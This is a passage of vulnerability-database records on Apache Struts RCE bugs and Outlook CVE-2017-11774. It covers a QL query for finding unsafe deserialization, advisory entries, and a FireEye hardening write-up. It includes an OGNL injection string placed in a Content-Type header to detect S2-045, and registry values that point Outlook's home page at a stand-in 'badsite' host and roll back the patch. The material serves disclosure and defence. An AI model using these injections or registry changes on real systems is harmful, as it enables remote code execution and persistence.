ContentTypeHandler() {\r\n\t this.hasQualifiedName(\"org.apache.struts2.rest.handler\", \"ContentTypeHandler\")\r\n\t }\r\n\t}\r\n\t\r\n\t/** The method `toObject` */\r\n\tclass ToObjectDeserializer extends Method {\r\n\t ToObjectDeserializer() {\r\n\t this.getDeclaringType().getASupertype*() instanceof ContentTypeHandler and\r\n\t this.getSignature = \"toObject(java.io.Reader,java.lang.Object)\"\r\n\t }\r\n\t}\r\n\r\nHere we use getASupertype*() to restrict the matching to any class that has ContentTypeHandler as a supertype.\r\n\r\nNext we want to mark the first argument of the toObject method as an untrusted data source, and track that data as it flows through the code paths. To do that, we extend the FlowSource class in QL's dataflow library:\r\n\r\n\t/** Mark the first argument of `toObject` as a dataflow source **/\r\n\tclass ContentTypeHandlerInput extends FlowSource {\r\n\t ContentTypeHandlerInput() {\r\n\t exists(ToObjectDeserializer des |\r\n\t des.getParameter(0).getAnAccess() = this\r\n\t )\r\n\t }\r\n\t}\r\n\r\nIntuitively, this definition says that any access to the first parameter of a toObject method, as captured by ToObjectDeserializer above, is a flow source. Note that for technical reasons, flow sources have to be expressions. Therefore, we identify all accesses of that parameter (which are expressions) as sources, rather than the parameter itself (which isn't).\r\n\r\nNow that we have the definition for a dataflow source, we can look for places where this tainted data is used in an unsafe deserialization method. We don't have to define that method (the sink) ourselves as it is already in the Deserialization of user-controlled data query (line 64: UnsafeDeserializationSink, we will need to copy its definition into the query console). Using this, our final query becomes:\r\n\r\n\tfrom ContentTypeHandlerInput source, UnsafeDeserializationSink sink\r\n\twhere source.flowsTo(sink)\r\n\tselect source, sink\r\n\r\nHere we use the .flowsTo predicate in FlowSource for tracking so that we only identify the cases when unsafe deserialization is performed on a ContentTypeHandlerInput source.\r\n\r\nWhen I ran the customized query on Struts there was exactly one result (Running it now will yield no result as the fix has been applied). I verified that it was a genuine remote code execution vulnerability before reporting it to the Struts security team. They have been very quick and responsive in working out a solution even though it is a fairly non-trivial task that requires API changes. Due to the severity of this finding I will not disclose more details at this stage. Rather, I will update this blog post in a couple of weeks' time with more information.\r\n# Vendor Response #\r\n\r\n 17 July 2017: Initial disclosure.\r\n 02 August 2017: API changes in preparation for patch.\r\n 14 August 2017: Patch from Struts for review.\r\n 16 August 2017: Vulnerability officially recognized as CVE-2017-9805\r\n 5 September 2017: Struts version 2.5.13 released\r\n\r\n# Mitigate unsafe deserialization risk with lgtm #\r\n\r\nlgtm runs the standard Deserialization of user-controlled data query on all Java projects. If your project uses deserialization frameworks detected by that query, and has user-controlled data reaching a deserialization method, you may see relevant alerts for this query on lgtm.com. Check any results carefully. You can also enable lgtm's pull request integration to prevent serious security issues like these from being merged into the code base in the first place.\r\n\r\nIf your project uses other deserialization frameworks, then you can use the query console to create your own custom version of the standard query.", "cvss3": {}, "published": "2017-09-06T00:00:00", "type": "seebug", "title": "Apache Struts2 S2-052 (CVE-2017-9805)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-9805"], "modified": "2017-09-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96420", "id": "SSV:96420", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:05:43", "description": "It is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).", "cvss3": {}, "published": "2017-03-21T00:00:00", "type": "seebug", "title": "S2-046: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92804", "id": "SSV:92804", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:01:16", "description": "Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command.\n\nSound detection method(the detection method by the constant company): the In to the server to issue the http request packet, modify the Content-Type field: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. multipart/form-data`\n\nSuch as the return response packets in the presence of vul: the vul field entry then indicates the presence of vulnerability.\n", "cvss3": {}, "published": "2017-03-06T00:00:00", "type": "seebug", "title": "S2-045: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92746", "id": "SSV:92746", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-09-21T12:35:55", "description": "Microsoft Outlook 2010 SP2, Outlook 2013 SP1 and RT SP1, and Outlook 2016 allow an attacker to execute arbitrary commands, due to how Microsoft Office handles objects in memory, aka \u201cMicrosoft Outlook Security Feature Bypass Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-13T00:00:00", "type": "attackerkb", "title": "CVE-2017-11774", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2021-07-27T00:00:00", "id": "AKB:0BE9878D-891A-4133-B0C0-C05BF85E129C", "href": "https://attackerkb.com/topics/3NZBasLq6g/cve-2017-11774", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-12T02:25:06", "description": "The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2017-9805", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2020-07-30T00:00:00", "id": "AKB:195A97E5-45A3-4A70-95E4-60FF9B5AD20D", "href": "https://attackerkb.com/topics/PH3MIA0Byl/cve-2017-9805", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T17:24:09", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-07-30T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-18T08:32:26", "description": "The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2017-9791", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2020-09-02T00:00:00", "id": "AKB:4D7DB359-066E-4E56-AFBB-FA98BF564F13", "href": "https://attackerkb.com/topics/rjpuGwbz6x/cve-2017-9791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-09-21T10:20:16", "description": "Microsoft Office Outlook contains a security feature bypass vulnerability due to improperly handling objects in memory. Successful exploitation allows an attacker to execute commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Outlook Security Feature Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-11774", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-5638", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apache Struts REST Plugin uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Deserialization of Untrusted Data Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-9805", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T21:15:27", "description": "Attackers have a dirty little secret that is being used to conduct big intrusions. We\u2019ll explain how they're \"unpatching\" an exploit and then provide new Outlook hardening guidance that is not available elsewhere. Specifically, this blog post covers field-tested automated registry processing for registry keys to protect against attacker attempts to reverse Microsoft\u2019s [CVE-2017-11774](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11774>) patch functionality.\n\nDespite multiple [warnings](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) [from FireEye](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [U.S. Cyber Command](<https://twitter.com/CNMF_VirusAlert/status/1146130046127681536>), we have continued to observe an uptick in successful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims\u2019 Outlook client homepages for code execution and persistence. The Outlook Home Page feature allows for customization of the default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and displayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference either an internal or external network location. When Outlook loads the remote URL, it will render the contents using the Windows DLL _ieframe.dll_, which can allow an attacker to achieve remote code execution that persists through system restarts.\n\nWe have observed multiple threat actors adopting the technique and eventually becoming a favorite for Iranian groups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by adoption by APT33 for a significantly broader campaign beginning in July 2018 and continuing for at least a year. To further increase awareness of this intrusion vector, our [Advanced Practices team worked with MITRE](<https://twitter.com/ItsReallyNick/status/1123285710491070464>) to [update the ATT&CK framework](<https://attack.mitre.org/resources/updates/updates-april-2019/index.html>) to include CVE-2017-11774 home page persistence within [technique T1137 \u2013 \u201cOffice Application Startup\u201d](<https://attack.mitre.org/techniques/T1137/>).\n\nFor more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside password spraying, and some common pitfalls for incident responders analyzing this home page technique, see the \u201cRULER In-The-Wild\u201d section of our December 2018 OVERRULED blog post.\n\n#### Going Through a Rough Patch\n\nOn October 10, 2017, [Microsoft released patches](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-outlook-2016-october-10-2017-4b7cbd2d-d6a8-6113-cca5-4040278a7df9>) for Microsoft Outlook to protect against this technique.\n\n * KB4011196 (Outlook 2010)\n * KB4011178 (Outlook 2013)\n * KB4011162 (Outlook 2016)\n\nFollowing the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye Mandiant team began to raise awareness of how the patch could be subverted. Doug Bienstock discussed in December 2018 that the simple roll back of the patch as a part of Mandiant\u2019s Red Team operations \u2013 [and alluded to observing authorized software that also automatically removes the patch functionality](<https://twitter.com/doughsec/status/1076222018369081345>). In response to U.S. Cyber Command\u2019s mid-2019 warning about APT33\u2019s use of the exploit, we [raised concern with DarkReading](<https://www.darkreading.com/attacks-breaches/us-military-warns-companies-to-look-out-for-iranian-outlook-exploits>) over the ability to override the CVE-2017-11774 patch without escalated privileges.\n\nWithout continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed within this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections provided by the patches.\n\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. The \u201cURL\u201d subkey will enable and set a home page for the specified mail folder within the default mailbox. Setting this registry key to a valid URL enables the home page regardless of the patch being applied or not. Although the option will not be accessible from the Outlook user interface (UI), it will still be set and render. Importantly, these keys are set within the logged-on user\u2019s Registry hive. This means that no special privileges are required to edit the Registry and roll back the patch. The FireEye Red Team found that no other registry modifications were required to set a malicious Outlook homepage.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\ Outlook\\WebView\\Inbox \n\u201cURL\u201d= http://badsite/homepage-persist.html \n--- \n \nThere are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\u201cEnableRoamingFolderHomepages\u201d= dword:00000001 \n--- \n \nThe following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home page.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\u201cNonDefaultStoreScript\"= dword:00000001 \n--- \n \nThe following setting will allow for \u201cRun as a Script\u201d and \u201cStart Application\u201d rules to be re-enabled.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\u201cEnableUnsafeClientMailRules\"= dword:00000001 \n--- \n \nEtienne Stalmans, a developer of [SensePost\u2019s RULER](<https://github.com/sensepost/ruler>) and the credited responsible discloser of CVE-2017-11774, [chimed in](<https://twitter.com/_staaldraad/status/1082604336574808065>) about similar concerns on the patch that were re-raised after seeing a [September 2018 blog post about applying the same technique to Outlook Today\u2019s home page](<https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943>) that is stored at HKCU\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Today\\UserDefinedUrl. Both Etienne and the September 2018 blog post\u2019s author describe what Microsoft has suggested as a key mitigating factor \u2013 that the exploit and rolling back the patch require some form of initial access. This is consistent with Microsoft\u2019s position and [their 2007 immutable laws of security blog](<https://docs.microsoft.com/en-us/archive/blogs/seanearp/immutable-laws-of-security>), which were reiterated when we contacted MSRC prior to publishing this blog post.\n\nWe agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to run his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no public mitigation guidance is available, and \u2013 as a fresh in-the-wild example demonstrates in this post \u2013 that initial access and patch overriding can be completely automated.\n\n#### A Cavalier Handling of CVE-2017-11774\n\nThe [Advanced Practices team](<https://twitter.com/ItsReallyNick/lists/fireeye-apt>) monitors for novel implementations of attacker techniques including this patch override, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. The sample, \u201cTARA Pipeline.xlsm\u201d (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros combining several techniques, including:\n\n * execution guardrails to only launch on the victim domain (client redacted in screenshot)\n * custom pipe-delimited character substitution obfuscation\n * a creative implementation of CVE-2017-11774 using the lesser-known HKCU\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\WebView\\Calendar\\URL registry key\n * a URL pointing to the payload [hosted in Azure storage blobs](<https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-static-website>) (*.web.core.windows.net) \u2013 a creative technique that allows an attacker-controlled, swappable payload to be hosted in a legitimate service\n * and most importantly for this blog post \u2013 a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook\n\nThese features of the malicious spear phishing Excel macro can be seen in Figure 1.\n\n![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/Picture1a.png?itok=-qKJ096T)\n\n \nFigure 1: Malicious macros automatically reverting the CVE-2017-11774 patch\n\nPay special attention to the forced setting of EnableRoamingFolderHomepages to \u201c1\u201d and the setup of \u201cCalendar\\URL\u201d key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch on initial infection.\n\nIn support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat activity \u2013 whether the intrusion operators turn out to be authorized or unauthorized \u2013 in order to prioritize and deconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity associated with authorized red teaming, UNC1194 , but you might know them better as the [TrustedSec](<https://twitter.com/TrustedSec>) red team whose founder, [Dave Kennedy, appeared on a previous episode of State of the Hack](<https://www.youtube.com/watch?v=eaTBHWtDaF0>). This malicious Excel file appears to be a weaponized version of a legitimate victim-created document that we also obtained \u2013 reflecting a technique becoming more common with both authorized and unauthorized intrusion operators. For further analysis and screenshots of UNC1194\u2019s next stage CVE-2017-11774 payload for initial reconnaissance, target logging visibility checks, and domain-fronted Azure command and control \u2013 [see here](<https://twitter.com/ItsReallyNick/status/1199209513137688576>). Readers should take note that the automated patch removal and home page exploitation establishes attacker-controlled remote code execution and allows these [thankfully authorized] attackers to conduct a full intrusion by swapping out their payload remotely for all follow-on activity.\n\n#### Locking Down the Registry Keys Using Group Policy Object (GPO) Enforcement\n\nAs established, the patches for CVE-2017-11774 can be effectively \u201cdisabled\u201d by modifying registry keys on an endpoint with no special privileges. The following registry keys and values should be configured via Group Policy to reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security configuration on an endpoint to allow for Outlook home page persistence for malicious purposes.\n\nTo protect against an attacker using Outlook\u2019s WebView functionality to configure home page persistence, the following registry key configuration should be enforced.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\WebView \n\"Disable\"= dword:00000001 \n--- \n \nNote: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a sampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.\n\nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Webview \n * Value Name: Disable\n * Value Type: REG_DWORD\n * Value Data: 00000001\n\n![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/Picture2.png?itok=J-4-UW-m)\n\n \nFigure 2: Disabling WebView registry setting\n\nIncluded within the [Microsoft Office Administrative Templates](<https://www.microsoft.com/en-us/download/details.aspx?id=49030\\)>), a GPO setting is available which can be configured to disable a home page URL from being set in folder properties for all default folders, or for each folder individually. If set to \u201cEnabled\u201d, the following GPO setting essentially enforces the same registry configuration (disabling WebView) as previously noted.\n\nUser Configuration > Policies > 